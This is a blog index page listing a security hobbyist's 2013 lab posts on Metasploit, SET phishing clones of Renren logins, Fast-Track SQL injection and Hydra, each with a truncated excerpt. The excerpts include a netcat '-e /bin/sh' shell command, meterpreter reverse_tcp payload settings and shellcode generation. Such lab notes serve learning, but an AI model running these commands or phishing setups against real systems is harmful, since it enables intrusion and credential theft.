backtrack
Average article quality score: 89
feier7501
This author is lazy and has left nothing behind…
Attacking mssql from BT5
mssql_ping:msf auxiliary(mssql_ping) > show optionsModule options (auxiliary/scanner/mssql/mssql_ping): Name Current Setting Required Description ---- --- Original 2013-08-18 13:32:26 · 3643 reads · 0 comments
(a)ttempt SQL Ping and Auto Quick Brute Force (to be continued)
On BT5R3, the file /pentest/exploits/fasttrack/config/fasttrack_config needs to be changed to: METASPLOIT_PATH=/opt/metasploit/app/ otherwise msfcli will not be found. Then enter fasttrack and proceed: root@bt:/pentest/exploits/fasttrack# ./fast-track.py -i Original 2013-07-08 23:06:58 · 1093 reads · 0 comments
SQL Injector - GET Manual Setup Binary Payload Attack
Operations on bt5: ***************************************************************** ** ** ** Fast-Track - A new beginning... Original 2013-07-08 21:43:26 · 1009 reads · 0 comments
SQL Injector - POST Parameter Attack
login.jsp is as follows: <%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%>Register user username: password: Operations on bt5 are as follows: root@bt:/pentest/exploits/fasttrack Original 2013-07-08 21:32:47 · 1339 reads · 0 comments
MSSQL2K - SQL Injector - Query String Parameter Attack combined with netcat to obtain a reverse cmd shell
fasttrack operations: root@bt:~# cd /pentest/exploits/fasttrack/root@bt:/pentest/exploits/fasttrack# ./fast-track.py -i****************************************************** Performing dependency checks... Original 2013-07-08 20:23:10 · 1120 reads · 0 comments
Logging into Renren (人人网) with the Tabnabbing Attack Method
Using the script from before, the output is as follows: Select from the menu: 1) Spear-Phishing Attack Vectors 2) Website Attack Vectors 3) Infectious Media Generator 4) Create a Payload and Listener 5) Mass Mailer Attack Original 2013-06-22 17:30:34 · 1805 reads · 4 comments
Logging into Renren (人人网) with the Credential Harvester Attack Method
Slightly modified the script ModifyForm.py: #!/usr/bin/python# Filename: ModifyForm.pyimport sysimport osfrom pyquery import PyQuery as pqfrom src.core.setcore import *def ModifyForm(htmlPath, url): if not o Original 2013-06-22 16:34:25 · 2147 reads · 0 comments
MSSQL2K - SQL Injector - Query String Parameter Attack: obtaining a reverse cmd shell
Last time the cmd shell was not obtained successfully, because fasttrack has no code for this; this time server.py was written. Link to the original post: http://blog.csdn.net/feier7501/article/details/9220495 import socketHOST = ''PORT = 4444s = socket.socket(socket.AF_INET, socket Original 2013-07-07 16:55:25 · 1587 reads · 0 comments
Script modification for Credential Harvester
Yesterday's test produced garbled characters. Debugged it tonight and made some changes. #!/usr/bin/python# Filename: ModifyFormAction.pyimport sysimport osfrom pyquery import PyQuery as pqdef ModifyFormAction(htmlPath, url): if not os.path.isfile(html Original 2013-06-20 23:59:00 · 1509 reads · 0 comments
Obtaining user information with the Credential Harvester Attack Method
A while ago, while studying SET, I found that the Credential Harvester Attack Method never managed to capture the login username and password. At first I captured packets with wireshark to debug, and indeed there was no corresponding data; later I suspected a problem in the code, so I looked at the python code. I have never learned python, so I had to go and learn some python. Looking at the code today, I saw that the code in cloner.py has a problem. So I modified it and added a new module: #!/usr/bin Original 2013-06-20 00:15:06 · 2634 reads · 0 comments
Obtaining a reverse shell with netcat
netcat download address: http://sourceforge.net/projects/netcat/?source=navbar On BT5: root@bt:~# nc -l -p 8090 -e /bin/sh On XP: E:\>nc 192.168.1.11 8090lsDesktopifconfigeth0 Link encap:Ethernet HWaddr Original 2013-07-06 17:20:40 · 3971 reads · 0 comments
Computer Based Social Engineering Tools: Social Engineer Toolkit (SET)
SET download address: https://github.com/trustedsec/social-engineer-toolkit/ Link to this article: http://www.social-engineer.org/framework/Computer_Based_Social_Engineering_Tools:_Social_Engineer_Toolkit_%28SET%29 The So Reposted 2013-06-05 14:07:53 · 7000 reads · 0 comments
The Credential Harvester Attack Method in metasploit's SET
Environment: BT5; XP or Win7; IE6, IE8, Google Chrome. Operations are as follows: root@bt:/pentest/exploits/set# ./set 01011001011011110111010100100000011100 10011001010110000101101100011011000111 1001 Original 2013-05-29 23:13:22 · 1437 reads · 0 comments
metasploit, SET, Tabnabbing Attack Method (no information obtained)
Environment: BT5, Firefox. Operations are as follows: root@bt:/pentest/exploits/set# ./set ________________________ __ ___/__ ____/__ __/ _____ \__ __/ __ / Original 2013-05-30 23:23:48 · 1873 reads · 0 comments
Using auxiliary modules in metasploit
Show all auxiliary modules: msf > show auxiliaryAuxiliary========= Name Disclosure Date Rank Description ---- Original 2013-05-15 22:12:28 · 13172 reads · 0 comments
metasploit WEB attack vectors
Environment: BT5R3, XP SP3, IE6. XP needs java installed and the java environment variables set. Operations are as follows: root@bt:/pentest/exploits/set# ./set .--. .--. .-----. : .--': .--'`-. .-' Original 2013-05-28 21:48:41 · 2818 reads · 0 comments
metasploit client-side WEB attacks
Environment: BT5R3, XP SP3, IE6. Operations are as follows: root@bt:/pentest/exploits/set# ./set ..######..########.######## .##....##.##..........##... .##.......##........ Original 2013-05-28 22:30:15 · 3195 reads · 0 comments
metasploit file-format vulnerability exploitation (shell obtained successfully)
Environment: BT5R1 msf > use windows/fileformat/ms11_006_createsizeddibsectionmsf exploit(ms11_006_createsizeddibsection) > set payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_t Original 2013-05-14 23:45:25 · 7175 reads · 7 comments
Msfpayload
http://www.offensive-security.com/metasploit-unleashed/Msfpayload msfpayload is a command-line instance of Metasploit that is used to generate and output all of the various types of shellco Reposted 2013-07-09 22:04:46 · 2167 reads · 0 comments
(a)ttempt SQL Ping and Auto Quick Brute Force, part 2: the cause
Debugged again tonight and found that the generated h2b.exe cannot run; this file is used to convert hex into bin, and the code that follows also seems to have problems: print "Metasploit payload delivered.." print "Converting our payload to binary, this may take a few..." query5=("""xp_c Original 2013-07-10 22:49:55 · 888 reads · 0 comments
Using bt5 and ollydbg to open a shell on XP
First generate the shellcode: root@bt:~# msfpayload windows/shell/bind_tcp LPORT=443 C/* * windows/shell/bind_tcp - 298 bytes (stage 1) * http://www.metasploit.com * VERBOSE=false, LPORT=443, RHOST=, EXITFUNC=pr Original 2013-05-12 16:24:37 · 1849 reads · 0 comments
How to use Hydra
http://www.2cto.com/Article/201305/213232.html This is also a very popular tool under backtrack. Parameter details: -R resume cracking from the last saved progress -S connect using the SSL protocol -s specify the port -l specify the username -L specify a username dictionary (file) -p specify the password to try -P specify a password dictionary (file) -e empty-password probing and username-as-password probing ( Reposted 2013-08-04 22:04:53 · 2957 reads · 0 comments
exploit/windows/smb/ms08_067_netapi
msf > use exploit/windows/smb/ms08_067_netapimsf exploit(ms08_067_netapi) > show payloadsCompatible Payloads=================== Name Disclosure Dat Original 2013-07-26 23:52:59 · 3912 reads · 0 comments
metasploit: db_autopwn
BT5R1: msf > db_autopwn -h[*] Usage: db_autopwn [options] -h Display this help text -t Show all matching exploit modules -x Select modules based on Original 2013-07-26 23:11:50 · 1301 reads · 0 comments
Easy Pentesting: Metasploit's db_autopwn
http://allanfeid.com/content/easy-pentesting-metasploits-dbautopwn Everyday, life gets easier for script kiddies. These days everything is pretty much automated. I came across the db_autopwn Reposted 2013-07-26 23:02:10 · 970 reads · 0 comments
metasploit: db_autopwn in practice
msf > db_nmap -O 192.168.1.142[*] Nmap: Starting Nmap 5.51SVN ( http://nmap.org ) at 2013-05-14 20:12 EDT[*] Nmap: Nmap scan report for 192.168.1.142[*] Nmap: Host is up (0.00047s latency).[*] Nma Original 2013-07-27 00:03:38 · 5660 reads · 1 comment
metasploit: hosts
BT5R1: msf > hosts -hUsage: hosts [ options ] [addr1 addr2 ...]OPTIONS: -a,--add Add the hosts instead of searching -d,--delete Delete the hosts instead of searching -c On Original 2013-07-26 23:18:36 · 1577 reads · 0 comments
metasploit: db_nmap
BT5R1: msf > db_nmap -h[*] Nmap: Nmap 5.51SVN ( http://nmap.org )[*] Nmap: Usage: nmap [Scan Type(s)] [Options] {target specification}[*] Nmap: TARGET SPECIFICATION:[*] Nmap: Can pass hostnames, Original 2013-07-26 23:15:52 · 5404 reads · 0 comments
ms08_067 successfully exploited
Yesterday the environment was FC9 and the exploit failed. I suspected it was an issue with the xp version, so I downloaded the English version of xp + sp2 and then used the metasploit in FC9 to exploit it again; it still failed. Seeing that the author used backtrack, I downloaded a bt4. bt4 comes with metasploit built in. This time the exploit succeeded. The process is as follows: Original 2013-04-12 22:09:58 · 5931 reads · 1 comment
MSSQL2K - SQL Injector - Query String Parameter Attack
Operations are as follows: root@root:/pentest/exploits/fasttrack# ./fast-track.py -i****************************************************** Performing dependency checks... ******************************************* Original 2013-07-01 23:11:52 · 1083 reads · 0 comments
Infectious Media Generator succeeded
It failed just now, then I rolled the BT5 virtual machine back to a previous snapshot and tried again, and it succeeded: root@bt:~# cd /pentest/exploits/set/root@bt:/pentest/exploits/set# ./setCopyright 2012, The Social-Engineer Toolkit (SET) by TrustedSec, LLCAll righ Original 2013-06-29 23:04:42 · 1251 reads · 0 comments
Arduino-Based Attack Vector
First two pieces of software need to be installed: 1. Download the Arduino Software 2. Download Teensyduino. In addition, a Teensy device needs to be purchased from http://www.pjrc.com/ for 16-24 US dollars. I did not buy one; I am just recording the process. Software installation: installing arduino is very simple, just keep clicking Next. Installing teensyduino is as follows: Original 2013-06-30 21:26:31 · 3497 reads · 0 comments
Infectious Media Generator failed
Operations are as follows: root@bt:/pentest/exploits/set# ./set 01011001011011110111010100100000011100 10011001010110000101101100011011000111 1001001000000110100001100001011101100 Original 2013-06-29 22:40:01 · 1299 reads · 0 comments
Multi-Attack Web Method
Operations are as follows: root@bt:~# cd /pentest/exploits/set/root@bt:/pentest/exploits/set# ./set 01011001011011110111010100100000011100 10011001010110000101101100011011000111 10 Original 2013-06-29 21:43:54 · 2270 reads · 0 comments
Man Left in the Middle Attack Method (man-in-the-middle attack)
Operations are as follows: root@bt:/pentest/exploits/set# ./set :::=== :::===== :::==== ::: ::: :::==== ===== ====== === Original 2013-06-27 22:48:10 · 1175 reads · 0 comments
Logging into Renren (人人网) with the Web Jacking Attack Method
Operations are as follows: root@bt:/pentest/exploits/set# ./set .--. .--. .-----. : .--': .--'`-. .-' `. `. : `; : : Original 2013-06-28 21:55:30 · 1690 reads · 0 comments
fasttrack's SQLPwnage (failed)
This time it also failed; operations are as follows: root@bt:/pentest/exploits/fasttrack# ./fast-track.py -iFast-Track Main Menu: 1. Fast-Track Updates 2. Autopwn Automation 3. Nmap Scripting Engine 4. Microsoft SQL Original 2013-07-11 21:08:24 · 1014 reads · 0 comments
metasploit file-format vulnerability exploitation (failed)
root@bt:~# msfconsole IIIIII dTb.dTb _.---._ II 4' v 'B .'"".'/|`.""'. II 6. .P : .' / | `. : II 'T;. .;P' '.' / | `.' II 'T; ;P' `. / | Original 2013-05-13 22:29:15 · 5391 reads · 1 comment
metasploit file-format vulnerability exploitation (doc generated successfully)
Because BT5R3 failed, I have now switched to BT5R1. msf > use windows/fileformat/ms11_006_createsizeddibsectionmsf exploit(ms11_006_createsizeddibsection) > set payload windows/meterpreter/reverse_tcppayload => windows/mete Original 2013-05-13 23:54:58 · 2890 reads · 0 comments
Hacking Windows XP SP3 Via MS11-006 Windows Shell Graphics Processing Vulnerability
Type : Tutorial Level : Medium Victim O.S : Windows XP SP3 Attacker O.S : Backtrack 5 R1 Why create a tutorial about hacking Windows XP?? now is the Windows 7 era so it's better t Reposted 2013-05-13 22:37:09 · 1301 reads · 0 comments